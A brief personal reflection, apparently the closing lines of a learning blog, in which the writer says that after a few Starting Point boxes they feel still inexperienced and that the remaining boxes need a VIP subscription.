A few boxes in, I have still learned quite a lot,
mostly that I am still far too green.
The remaining Starting Point boxes need VIP;
maybe I'll buy it some day on a whim.

EOF